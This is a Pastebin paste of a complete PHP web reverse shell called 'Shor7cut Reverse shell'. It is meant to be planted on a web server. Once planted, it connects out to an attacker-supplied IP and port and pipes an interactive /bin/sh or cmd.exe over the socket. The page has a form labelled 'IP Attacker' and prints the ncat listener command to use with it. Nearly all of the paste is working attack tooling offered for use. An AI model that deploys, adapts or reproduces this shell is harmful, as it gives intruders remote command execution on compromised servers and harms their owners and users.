Advertisement
shor7cut

Shor7cut Reverse shell

Oct 9th, 2015
645
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. /*
  3. SHOR7CUT | BUG7SEC
  4. */
  5. error_reporting(0);
  6. if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
  7. $os = "Windows";
  8. }else{
  9. $os = "Linux";
  10. }
  11.    if (!empty($_SERVER['HTTP_CLIENT_IP'])){
  12.         $ipaddress=$_SERVER['HTTP_CLIENT_IP'];
  13.     }elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])){
  14.         $ipaddress=$_SERVER['HTTP_X_FORWARDED_FOR'];
  15.     }else{
  16.         $ipaddress=$_SERVER['REMOTE_ADDR'];
  17.     }
  18. /* ---------------------------- */
  19. set_time_limit (0);
  20. if($_POST['submit']){
  21. $VERSION = "1.0";
  22. $ip = $_POST['ip'];
  23. $port = $_POST['port'];
  24. $chunk_size = 1400;
  25. $write_a = null;
  26. $error_a = null;
  27. if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
  28. $shell = "C:\\Windows\\system32\\cmd.exe";
  29. }else{
  30. $shell = "uname -a; w; id; /bin/sh -i";
  31. }
  32. $daemon = 0;
  33. $debug = 0;
  34. if (function_exists('pcntl_fork')) {
  35.     $pid = pcntl_fork();
  36.    
  37.     if ($pid == -1) {
  38.         print("ERROR: Can't fork");
  39.         exit(1);
  40.     }
  41.    
  42.     if ($pid) {
  43.         exit(0);
  44.     }
  45.     if (posix_setsid() == -1) {
  46.         print("Error: Can't setsid()");
  47.         exit(1);
  48.     }
  49.  
  50.     $daemon = 1;
  51. } else {
  52.     $pesan.= "<font color=red>.[LOG]Gagal ke daemonise , ini tidak fatal.</font><br>";
  53.     header("Location: ?pesan=$pesan");
  54. }
  55. chdir("/");umask(0);
  56. $sock = fsockopen($ip, $port, $errno, $errstr, 30);
  57. if (!$sock) {
  58.     print("$errstr ($errno)");
  59.     exit(1);
  60. }
  61. $descriptorspec = array(
  62.    0 => array("pipe", "r"),
  63.    1 => array("pipe", "w"),
  64.    2 => array("pipe", "w")
  65. );
  66.  
  67. $process = proc_open($shell, $descriptorspec, $pipes);
  68.  
  69. if (!is_resource($process)) {
  70.     $pesan.= "<font color=red>.[LOG]Tidak bisa memuat shell.</font><br>";
  71.     header("Location: ?pesan=$pesan");
  72.     exit(1);
  73. }
  74. stream_set_blocking($pipes[0], 0);
  75. stream_set_blocking($pipes[1], 0);
  76. stream_set_blocking($pipes[2], 0);
  77. stream_set_blocking($sock, 0);
  78.     $pesan.= "<font color=white>.[LOG]reverse shell berhasil ke $ip:$port.</font><br>";
  79.     header("Location: ?pesan=$pesan");
  80.  
  81. $is = 1;
  82. for ($i=0; $i <$is; $i++) {
  83.     if (feof($sock)) {
  84.     $pesan.= "<font color=red>.[LOG]Koneksi shell terputus.</font><br>";
  85.     header("Location: ?pesan=$pesan");
  86.         break;
  87.     }
  88.     if (feof($pipes[1])) {
  89.     $pesan.= "<font color=red>.[LOG]Koneksi shell terputus.</font><br>";
  90.     header("Location: ?pesan=$pesan");
  91.         break;
  92.     }
  93.     $read_a = array($sock, $pipes[1], $pipes[2]);
  94.     $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
  95.     if (in_array($sock, $read_a)) {
  96.         if ($debug) print("SOCK READ");
  97.         $input = fread($sock, $chunk_size);
  98.         if ($debug) print("SOCK: $input");
  99.         fwrite($pipes[0], $input);
  100.     }
  101.     if (in_array($pipes[1], $read_a)) {
  102.         if ($debug) print("STDOUT READ");
  103.         $input = fread($pipes[1], $chunk_size);
  104.         if ($debug) print("STDOUT: $input");
  105.         fwrite($sock, $input);
  106.     }
  107.     if (in_array($pipes[2], $read_a)) {
  108.         if ($debug) print("STDERR READ");
  109.         $input = fread($pipes[2], $chunk_size);
  110.         if ($debug) print("STDERR: $input");
  111.         fwrite($sock, $input);
  112.     }
  113. flush();
  114.     ob_flush();
  115.     $is++;
  116. }
  117.  
  118. fclose($sock);
  119. fclose($pipes[0]);
  120. fclose($pipes[1]);
  121. fclose($pipes[2]);
  122. proc_close($process);
  123. function printit ($string) {
  124.     if (!$daemon) {
  125.     $pesan.= "<font color=red>.[LOG]$string.</font><br>";
  126.     header("Location: ?pesan=$pesan");
  127.     }
  128. }
  129. }else{
  130. ?>
  131. <!DOCTYPE html>
  132. <html>
  133. <head>
  134.         <title>Shor7cut Reverse shell</title>
  135.         <link rel='shortcut icon' type='image/x-icon' href='http://s24.postimg.org/glkiiddg5/frog_152630_1280.png' />
  136.         <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.4.0/css/font-awesome.min.css">
  137.         <meta name="description" content="Shor7cut Reverse shell">
  138.         <meta name="viewport" content="width=device-width, initial-scale=1">
  139.         <style type="text/css">
  140.         body {
  141.     background: black;
  142.     color: #00FF00;
  143.     font-family: monospace;
  144. }
  145.  
  146. .accessGranted {
  147.     position: absolute;
  148.     top: 200px;
  149.     background: #333;
  150.     padding: 20px;
  151.     border: 1px solid #999;
  152.     width: 300px;
  153.     left: 50%;
  154.     margin-left: -150px;
  155.     text-align: center;
  156. }
  157.  
  158. .accessDenied {
  159.     position: absolute;
  160.     top: 200px;
  161.     color: #F00;
  162.     background: #511;
  163.     padding: 20px;
  164.     border: 1px solid #F00;
  165.     width: 300px;
  166.     left: 50%;
  167.     margin-left: -150px;
  168.     text-align: center;
  169. }
  170. #content-center {
  171.     width: 400px;
  172.     padding: 0px 10px 10px 10px;
  173.     width: 800px;
  174.     margin: 0 auto;
  175. }
  176. #content-left {
  177. margin: 0 auto;
  178.      text-align: left;
  179. }
  180. #content-right {
  181. margin: 0 auto;
  182.      text-align: right;
  183. }
  184. input,select,textarea{
  185.     border:0;
  186.     border:1px solid #900;
  187.     background:black;
  188.     margin:0;
  189.         color: white;
  190.  
  191.     padding:2px 4px;
  192. }
  193. input:hover,textarea:hover,select:hover{
  194.     background:black;
  195.         color: red;
  196.  
  197.     border:1px solid #f00;
  198. }
  199.                         a{ text-decoration:none; color:red;}
  200. </style>
  201. </head>
  202. <body>
  203. <div id="content-center">
  204. <pre>
  205. __________                                                .__           .__  .__  
  206. \______   \ _______  __ ___________  ______ ____     _____|  |__   ____ |  | |  |  
  207.  |       _// __ \  \/ // __ \_  __ \/  ___// __ \   /  ___/  |  \_/ __ \|  | |  |  
  208.  |    |   \  ___/\   /\  ___/|  | \/\___ \\  ___/   \___ \|   Y  \  ___/|  |_|  |__
  209.  |____|_  /\___  >\_/  \___  >__|  /____  >\___  > /____  >___|  /\___  >____/____/
  210.         \/     \/          \/           \/     \/       \/     \/     \/          
  211. </pre>
  212. <form action="" method="POST">
  213. IP Attacker : <input type="text" name="ip" value="<?= $ipaddress;?>">
  214. <select name="port">
  215.     <option value="3202">3202</option>
  216.     <option value="1337">1337</option>
  217.     <option value="3813">3813</option>
  218.     <option value="4444">4444</option>
  219.     <option value="70847">70847</option>
  220.     <option value="1337">1337</option>
  221.     <option value="6677">6677</option>
  222.     <option value="1313">1313</option>
  223.     <option value="130707">130707</option>
  224. </select>
  225. <!--
  226. Port Attacker : <input type="text" name="port">
  227. -->
  228. <input type="hidden" name="run" value="1">
  229. <input type="submit" name="submit" value=">>">
  230. </form>
  231. <?php
  232. if($_GET['pesan']){?>
  233. <pre>
  234. .-----------------[ LOG INFO ]-----------------.
  235. <?= $_GET['pesan'];?>
  236. .--------------------------------------------.-.
  237. </pre>
  238. <?php
  239. }
  240. ?>
  241.  
  242.  
  243.  
  244. <pre>
  245. .-----------------[ SYS INFO ]-------------------.
  246. .[OS]           : <?= $os."\r\n";?>
  247. .[IP Local]     : <?= $_SERVER['SERVER_ADDR']."/".gethostbyname($_SERVER['SERVER_NAME'])."\r\n";?>
  248. .[IP Attacker]  : <?= $ipaddress."\r\n";?>
  249. .------------------------------------------------.
  250. . Reverse shell : Windows or Linux
  251. .------------------------------------------------.
  252. .------------------------------------------------.
  253. . Command       : ncat -vv -n -l -p {port}
  254. .------------------------------------------------.
  255. SHOR7CUT | <font color="red">BUG</font><i class="fa fa-bug"></i><font color="white">7SEC</font> | Learn and become an expert
  256. </pre>
  257. </div>
  258. </body>
  259. </html>
  260. <?php
  261. }
  262. ?>
Advertisement
RAW Paste Data Copied
Advertisement